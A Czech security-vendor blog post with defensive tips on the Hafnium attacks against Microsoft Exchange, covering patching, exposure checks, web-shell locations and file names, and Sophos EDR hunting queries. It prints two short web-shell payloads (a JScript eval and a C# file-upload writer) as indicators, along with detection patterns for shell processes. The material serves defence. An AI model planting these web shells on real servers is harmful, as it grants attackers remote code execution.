Hafnium – bezpečnostní tipy

Jak jsme vás informovali v předchozím článku, kybernetický svět ochromila nová hrozba Hafnium – své označení získala podle skupiny hackerů, kteří využili zranitelnosti v MS Exchange. Přinášíme vám bezpečnostní tipy:

1. Aplikujte záplaty

Aplikujte bezpečnostní záplaty na všechny on-premise servery Microsoft Exchange ve vašem prostředí pomocí příslušné aktualizace zabezpečení. Podrobnosti najdete na blogu Microsoft Exchange Team.

Pokud se vám nedaří záplaty aplikovat, implementujte pravidlo IIS Re-Write a zakažte služby Unified Messaging (UM), Exchange Control Panel (ECP) VDir a Offline Address Book (OAB) VDir Services. Podrobnosti najdete na blogu Microsoft Security Response Center.

Před opravou a aktualizací doporučujeme provést zálohu protokolů Exchange IIS/Server.

2. Určete možné expozice

Stáhněte a spusťte skript Test-ProxyLogon.ps1 poskytnutý týmem podpory zákazníků společnosti Microsoft, abyste určili možnou expozici.

Je důležité si uvědomit, že nainstalované opravy nevyřeší přítomnost škodlivých webových kódů. Z tohoto důvodu doporučujeme použít skript společnosti Microsoft k identifikaci postižených serverů. Test-ProxyLogon.ps1 může vytvořit více log souborů CSV na server Exchange v závislosti na tom, co najde. Tyto soubory .csv lze zobrazit v textovém editoru nebo tabulkové aplikaci.

Skript vyhledá důkazy o zneužití každé chyby zabezpečení a vytvoří soubor .csv na CVE. Rovněž bude hledat podezřelé soubory, které by měly být zkontrolovány a vypočítá, kolik dní zpět v protokolech dokáže identifikovat potenciální zneužití zranitelností.

Nejčastější výstup souvisí s CVE-2021-26855.

Počítače, které mohli být zneužiti chybou CVE-2021-26855, budou uvedeni v souboru [HOSTNAME] -Cve-2021-26855.csv

Ve sloupci „ClientIpAddress“ budou uvedeny zdrojové IP adresy potenciálních útočníků.

Ve sloupci „AnchorMailbox“ bude uvedena cesta k různým aplikacím spuštěným na serveru Exchange, na které bylo možné cílit. Chcete-li zjistit, jaké akce mohl útočník podniknout, budete muset extrahovat příslušnou aplikaci z AnchorMailbox.
např. pro „ServerInfo ~ a] @ [ZRUŠENO]: 444 / autodiscover / autodiscover.xml? #“ příslušná aplikace je / autodiscover /

Chcete-li zjistit, jaké akce byly provedeny protivníkem, musíte se podívat na protokoly v% PROGRAMFILES% \ Microsoft \ Exchange Server \ V15 \ Logging \ {application}
např. % PROGRAMFILES% \ Microsoft \ Exchange Server \ V15 \ Logování \ autodiscover \

Sloupec „DateTime“ v [HOSTNAME] -Cve-2021-26855.csv vám poskytne dobu, kdy došlo k potenciálnímu zneužití, které se použije při odkazování na soubory protokolu.

3. Hledejte webové kódy a podezřelé soubory .aspx

Web shells byly pozorovány v těchto adresářích:

  • <volume>\inetpub\wwwroot\aspnet_client\
    • e.g. C:\inetpub\wwwroot\aspnet_client\
  • <volume>\inetpub\wwwroot\aspnet_client\system_web\
  • <exchange install path>\FrontEnd\HttpProxy\owa\auth\
    • e.g. C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\
  • <exchange install path>\FrontEnd\HttpProxy\owa\auth\Current\
  • <exchange install path>\FrontEnd\HttpProxy\owa\auth\<folder with version number>\

Mezi častá jména patří:

  • (8 náhodných znaků)
    • Regex: [0-9a-zA-Z]{8}.aspx
  • aspnet_client.aspx
  • aspnet_iisstart.aspx
  • aspnet_www.aspx
  • aspnettest.aspx
  • discover.aspx
  • document.aspx
  • error.aspx
  • errorcheck.aspx
  • errorEE.aspx
  • errorEEE.aspx
  • errorEW.aspx
  • errorFF.aspx
  • healthcheck.aspx
  • help.aspx
  • HttpProxy.aspx
  • Logout.aspx
  • MultiUp.aspx
  • one.aspx
  • OutlookEN.aspx
  • OutlookJP.aspx
  • OutlookRU.aspx
  • RedirSuiteServerProxy.aspx
  • shell.aspx
  • shellex.aspx
  • supp0rt.aspx
  • system_web.aspx
  • t.aspx
  • TimeoutLogout.aspx
  • web.aspx
  • web.aspx
  • xx.aspx

4. Zapojte Sophos EDR

Pokud používáte Sophos EDR, můžete pomocí následujících příkladů dotazů identifikovat potenciální web shells, zkontrolovat úroveň opravy vašich serverů a vyhledat podezřelé příkazy z podřízených procesů w3wp.exe (pracovní proces webového serveru Microsoftu IIS, používá Exchange).

/* Query for known web shell names */
SELECT
datetime(btime,'unixepoch') AS created_time,
filename,
directory,
size AS fileSize,
datetime(atime, 'unixepoch') AS access_time,
datetime(mtime, 'unixepoch') AS modified_time
FROM file
WHERE
(path LIKE 'C:\inetpub\wwwroot\aspnet_client\%' OR path LIKE 'C:\inetpub\wwwroot\aspnet_client\system_web\%' OR path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\%')
AND filename IN ('web.aspx','help.aspx','document.aspx','errorEE.aspx','errorEEE.aspx','errorEW.aspx','errorFF.aspx','web.aspx','healthcheck.aspx','aspnet_www.aspx','aspnet_client.aspx','xx.aspx','shell.aspx','aspnet_iisstart.aspx','one.aspx','errorcheck.aspx','t.aspx','discover.aspx','aspnettest.aspx','error.aspx','RedirSuiteServerProxy.aspx','shellex.aspx','supp0rt.aspx','HttpProxy.aspx','system_web.aspx','OutlookEN.aspx','TimeoutLogout.aspx','Logout.aspx','OutlookJP.aspx','MultiUp.aspx','OutlookRU.aspx');
/* Query for web shells with randomized 8 character names */
SELECT
datetime(btime,'unixepoch') AS created_time,
regex_match(filename, '[0-9a-zA-Z]{8}.aspx', 0) AS filename,
directory,
size AS fileSize,
datetime(atime, 'unixepoch') AS access_time,
datetime(mtime, 'unixepoch') AS modified_time
FROM file
WHERE (path LIKE 'C:\inetpub\wwwroot\aspnet_client\%' OR path LIKE 'C:\inetpub\wwwroot\aspnet_client\system_web\%' OR path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\%');

Při kontrole potenciálních web shells identifikovaných dotazy se obvykle objeví uvnitř konfiguračního souboru Exchange Offline Address Book (OAB) v poli ExternalUrl. Například:

ExternalUrl : http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["key-here"],"unsafe");}</script>
ExternalUrl: http://g/<script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath("error.aspx"));}}</script>

5. Stanovte dopad

Zkontrolujte aktivitu procesu a provádění příkazů od okamžiku vytvoření webového prostředí. Prozkoumejte aktivitu w3wp.exe (pracovní proces webového serveru IIS) a všechny instance csc.exe (kompilátor C #) spuštěné jako podřízený proces. Následující dotaz Sophos EDR Live Discover vám pomůže při identifikaci tohoto druhu aktivity.

/* MULTI - Query for patch level, web shells, and suspicious commands */
SELECT '----------------------' Test, '----------------------' Result, '----------------------' Evidence UNION ALL
-- Check the version of Exchange that is running, to determine if it's patched
SELECT DISTINCT
   'Check Exchange Version to confirm Patch' Test,
   CASE product_version 
      WHEN '15.0.1497.12' THEN 'Patched'
      WHEN '15.1.2106.13' THEN 'Patched'
      WHEN '15.1.2176.9' THEN 'Patched'
      WHEN '15.2.721.13' THEN 'Patched'
      WHEN '15.2.792.10' THEN 'Patched'
      ELSE 'NOT PATCHED'
   END Result,
   'Product_Version: ' || Product_version Evidence
FROM file 
WHERE path = ( (SELECT data FROM registry 
                WHERE key = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ExchangeServer\v15\Setup' AND path = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ExchangeServer\v15\Setup\MsiInstallPath' 
               )||'bin\Microsoft.Exchange.RpcClientAccess.Service.exe')UNION ALL
-- Identify common webshells which which may exist. Files with creation dates after Feb 28, 2021 should be reviewed.
SELECT DISTINCT
   'List of Suspect Web Shell files (if any).' TEST,
   CAST(GROUP_CONCAT(filename || CHAR(10)) AS TEXT) Result,
   CAST(GROUP_CONCAT('PATH: ' || path || CHAR(10) || 'CREATED ON: ' || DATETIME(btime,'unixepoch') || CHAR(10)) AS TEXT) Evidence
FROM file
WHERE (path LIKE 'C:\inetpub\wwwroot\aspnet_client\%' OR path LIKE 'C:\inetpub\wwwroot\aspnet_client\system_web\%' OR 
       path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\%') AND 
      (filename IN ('web.aspx','help.aspx','document.aspx','errorEE.aspx','errorEEE.aspx','errorEW.aspx','errorFF.aspx','web.aspx',
                    'healthcheck.aspx','aspnet_www.aspx','aspnet_client.aspx','xx.aspx','shell.aspx','aspnet_iisstart.aspx','one.aspx',
                    'errorcheck.aspx','t.aspx','discover.aspx','aspnettest.aspx','error.aspx','RedirSuiteServerProxy.aspx','shellex.aspx',
                    'supp0rt.aspx','HttpProxy.aspx','system_web.aspx','OutlookEN.aspx','TimeoutLogout.aspx','Logout.aspx',
                    'OutlookJP.aspx','MultiUp.aspx','OutlookRU.aspx') OR
       (LENGTH(filename) = 13) )UNION ALL
-- Identify the common pattern for commands being executed from a webshell. This is looking over the last (15 days), but can be adjusted.
SELECT DISTINCT
   'Suspicious Commands Detected as Child Process' TEST,
   'Found a Suspicious Command Which Could Have Spawned from a Web Shell' Result,
   DateTime(time, 'unixepoch') || ',' ||sophosPID || ',' || processname || ',' || cmdline  Evidence
FROM sophos_process_journal spj WHERE LOWER(spj.processname) IN ('cmd.exe','powershell.exe', 'csc.exe') AND time > strftime('%s','now','-15 days') AND 
   (SELECT LOWER(processname) FROM sophos_process_journal spj2 WHERE spj2.sophosPID = spj.parentSophosPID) IN ('w3wp.exe', 'umworkerprocess.exe')

Jak vám může pomoci Sophos Managed Threat Response (MTR)?

Když se objevily první zprávy o HAFNIUM, tým Sophos MTR okamžitě případ začal řešit v zákaznických prostředích, aby zjistil, zda došlo k nějaké aktivitě související s útokem. Dále se také snažili odhalit všechny nové případy nebo IoC související s útokem, které by mohly poskytnout další ochranu všem zákazníkům Sophos. Povaha Sophos MTR s nepřetržitým provozem znamenala, že se neztratila ani vteřina, než se tým dostal do práce.

SophosLabs také publikoval detekce související se známou aktivitou a IOC související se zranitelností Exchange. MTR je doplněk k předchozím ochranám, které jsou již k dispozici pro detekci aktivity po zneužití.

Znepokojuje vás Hafnium?

  1. Kontaktujte nás a zajistěte, že ve vašem prostředí byla identifikována a neutralizována veškerá potenciální nepřátelská aktivita.
  2. Přečtěte si náš článek s informacemi o útoku Hafnium.
  3. Zúčastněte se našeho webináře: Hafnium – průvodce novou kybernetickou hrozbou.

Zabezpečení brány

Zabraňte hackerům v útoku na vaši síť! Využijte nejpokročilejší technologie a ochraňte data ve vaší společnosti.

Dárek pro odběratele newsletteru

Průvodce kybernetickou prevencí

Zjistěte, jak díky několika základním radám můžete zvýšit úroveň vašeho zabezpečení a ochránit data proti nejpokročilejších hrozbám.

Novinky ze světa kyberbezpečnosti na váš e-mail

Co je nového v oblasti IT security? Buďte v obraze. Jednou měsíčně vám pošleme to nejzajímavější o bezpečnosti firemních sítí a dat.

Přihlaste se k odběru newsletteru, ať vám neuniknou žádné tipy v oblasti kyberbezpečnosti. Jako dárek dostanete e-book.